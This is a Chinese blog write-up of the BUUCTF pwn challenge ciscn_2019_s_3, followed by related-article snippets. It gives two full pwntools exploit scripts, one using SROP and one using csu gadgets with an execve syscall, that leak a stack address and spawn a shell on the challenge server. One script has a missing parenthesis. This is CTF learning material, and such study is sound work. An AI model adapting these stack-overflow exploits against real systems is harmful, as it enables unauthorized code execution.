从BUUCTF之ciscn_2019_s_3简单实践SROP和通用gadget+execve系统调用

最新推荐文章于 2025-04-21 21:38:04 发布
最新推荐文章于 2025-04-21 21:38:04 发布
阅读量782 收藏
点赞数
分类专栏: 二进制pwn学习 文章标签: pwn linux 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Probeginner/article/details/121539559
版权

这题总的来说让我实践了SROP、通用gadget、一些gdb调试体会

第一种解法:SROP

from pwn  import*
context(arch='amd64',os='linux',log_level='debug')#这一句必须加,否则报错
p=remote('node4.buuoj.cn',27793)
leak = '/bin/sh\x00'*2+p64(0x4004ed)
p.sendline(leak)
p.recv(0x20)
addr1=u64(p.recv(8))-280

p_rdi=0x4005a3

frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = addr1
frame.rsi = 0
frame.rdx =0
frame.rip=0x400517
#paylaod = '/bin/sh\x00' + 'a'*8 + p64(0x4004da) + p64(0x400501) + p64(str(frame))最后一个P64这样用是错误的。
paylaod = '/bin/sh\x00' *2 + p64(0x4004da) + p64(0x400501) + str(frame)
p.sendline(paylaod)
p.interactive()

更详细的框架请看:
SROP原始讲解

第二种解法:通用gadget+execve系统调用

from pwn import*
from pwnlib.rop.call import StackAdjustment
context.log_level='debug'
p=remote('node4.buuoj.cn',27069)
leak = '/bin/sh\x00'*2+p64(0x4004ed)#这里为什么不覆盖rbp,因为IDA查看汇编代码时发现没有leave语句,直接retn了,和之前的不一样。
p.sendline(leak
p.recv(0x20)
addr1=u64(p.recv(8))
binsh=addr1-280#这个偏移是个问题:1.栈的地址 2.read输入的地址
p_bx_bp_12_13_14_15=0x40059a
mov_dx_13=0x400580
set_execve=0x4004e2
system_=0x400517
paylaod= '/bin/sh\x00'+'a'*8+p64(p_bx_bp_12_13_14_15)#控制寄存器赋值
paylaod+=p64(0)*2
paylaod+=p64(binsh+0x50)
paylaod+=p64(0)*3
paylaod+=p64(mov_dx_13)
paylaod+=p64(set_execve)#这个就是上边binsh+0x50 的地方:赋值r12,接着去自然执行0x4004e2处的代码
paylaod+=p64(0x4005a3)+p64(binsh)+p64(system_)
p.sendline(paylaod)
p.interactive()

接着我们来谈谈泄露栈地址的问题:
1:gdb ,main函数下断点然后执行,发现rsi存的地址就是栈的地址。
2:read最初输入的地址可以在“1”的基础上输入c继续执行,而后输入“a*8”,接着find “aaaaaaaa”这个地址就是read最初输入的地址。更具体的请看这来两位师傅的:

师傅1

师傅2

pwnciscn_2019_s_3
Nothing
12-14 4749
是全国大学生信息安全竞赛的一道线下半决赛目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往栈上写数据(0x400),从栈上读数据(0x30),存在栈溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
ciscn_2019_s_3
m0_52231248的博客
11-16 1306
ciscn_2019_s_3 Checksec: Ida: 看到代码量很少,同时出现了syscall基本上这就是srop了。 接下来确定溢出,offest=0x10 srop :伪造 sigreturn frame 去 伪造 execve("/bin/sh",0,0) 来 getshell 我们已经确定了offest还需要完成 1,需要知道栈的地址(比如需要知道自己构造的字符串`/bin/sh`的地址); 2,需要知道`syscall`指令在内存中的地址; 3,需要知
ciscn_2019_s_3(SROP)
m0_62322730的博客
04-18 418
PWN学习:ciscn_s_3SROP。萌新的第一篇博客,有任何错误请指正~
buuctf--ciscn_2019_s_3
最新发布
2301_81060697的博客
04-21 829
64位系统调用,通过csu设置rdx为0
buuctf ciscn_2019_s_3
carol2358的博客
04-20 1453
对还是萌新的我来说有点难,用的SROP 在这里插入图片描述
BUUCTF pwn ciscn_2019_s_3(SROP)
菜的只能随便写写博客
02-13 1680
0x01 文件分析   0x02 运行  有一个回显,并且还有多余的字符显示,接着看代码分析一下。   0x03 IDA源码  由后面的函数可以看出,这个程序使用的系统调用,并且vuln里面存在栈溢出。  在程序之中的gadgets存在着两个为rax赋值的gadget,15的系统号是rt_sigreturn,3b的系统调用execve,利用这两个可以执行系统调用得到shell。  ex...
buuctf:ciscn_s_3
xia0ji233
05-27 818
title: 系统调用的学习 date: 2021-05-25 22:00:00 tags: binary security study report syscall comments: true categories: ctf pwn today新的知识又增长了,发现了getshell的另一种方式:syscallsrop。故事还要源于…(此处省略万字输出) (note:本作者这次有点懒,没有写AT&T汇编,而是一律用了intel汇编,请悉知) 可能是之前汇编基础不太好吧,竟没有发现sy.
syscall指令_ctf中关于syscall系统调用简单分析
weixin_36190812的博客
12-28 424
原创 紫色仰望 合天智汇0x01我在动态调试这个程序的时候,发现 syscall调用 系统函数 的过程很有趣,于是便记录下来 希望对大家 能带来些帮助,这里 以 buu 平台上的 ciscn_2019_s_3 为例,给大家详细地分享以及分析下!0x02在开始之前,我们先来认真 学习下 read(),write()的 原型:read():ssize_t read(int fd,const void...
SROP 学习笔记
Assassin
05-14 1084
文章目录一、基本介绍二、signal 机制三、攻击原理四、SROP chain的构造五、关于利用六、例讲解 本文只是学习的记录文章,主要是以CTF wiki为主,然后加上例讲解。 一、基本介绍 SROP(Sigreturn Oriented Programming) 于 2014 年被 Vrije Universiteit Amsterdam 的 Erik Bosman 提出,其相关研究Framing Signals — A Return to Portable Shellcode发表在安全顶级会议
SROP基本原理利用
MillionSky的专栏
03-19 7056
1 概述SROP: Sigreturn Oriented Programming ,系统Signal Dispatch之前会将所有寄存器压入栈,然后调用signal handler,signal handler返回时会将栈的内容还原到寄存器。 如果事先填充栈,然后直接调用signal handler,那在返回的时候就可以控制寄存器的值。2 资源1. Framing Signals—A Return...
CTF buuoj pwn-----第12: ciscn_2019_s_3
bing_Max的博客
10-09 1724
函数分析 编写exp from pwn import * sh = remote('node4.buuoj.cn', 27939) context(arch='amd64',os='linux', log_level='debug') main_addr= 0x4004ED # 这里其实是vuln的地址, main地址会错:timeout: the monitored command dumped core payload_1 = b'/bin/sh\x00' + b'a'*0x8 + p.
BUUCTF - PWNciscn_2019_s_3
古月浪子的博客
04-17 834
checksec一下,栈溢出 IDA打开看看,main函数内只有一个call vuln 注意到vuln函数末尾并没有使用leave指令,即直接把之前push的rbp当作return address 我们要ROP的话offset只需要0x10 程序里还给了一些gadget,注意到当rax=0x3b时syscall为execve,只需要让rdi="/bin/sh"、rsi=0、rdx=0即可ge...
pwn ciscn_2019_s_3
beaster1的博客
03-23 258
pwn ciscn_2019_s_3srop) checksec一下发现是64位文件 并只开了NX保护 打开IDA 进入main函数直接转到vuln(可以看到明显栈溢出var_10距离rpb 0x10) 发现有两个系统调用号,系统调用号的传参方式是先将调用号传入rax,然后参数依次从左至右传入rdi,rsi,rdx寄存器中,最后返回值存入rax 看到最后有点奇怪开始时pop rbp mov rbp,rsp 程序结束的时候直接是:retn(pop rip) 这里直接就跳出vuln函数了 所以r
[PWN] BUUCTF ciscn_2019_s_3
空城惜梦的博客
05-31 612
Ciscn_2019_s_3的调试过程步骤payload参考wp 步骤 按照惯例先checksec 用64位ida打开发现main中只要一个关键函数vuln,以及发现有gadgets函数 记录vuln地址:0x4004ED 分析vuln发现进行了系统调用,一个是sys_read,一个是sys_write 调用号:sys_read 的调用号 为 0 ;sys_write 的调用号 为 1; 记录syscall地址:0x400501或0x400517 图中分别给read的三个参数赋值0,&buf,
BUUCTF(pwn) ciscn_2019_s_3 [ 栈溢出SROP攻击]
半岛铁盒的博客
08-10 427
64位,开启了NX保护 main函数调用了vuln
csicn_2019_s_3
Morphy_Amo的博客
03-06 433
万能gadgetSROP
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值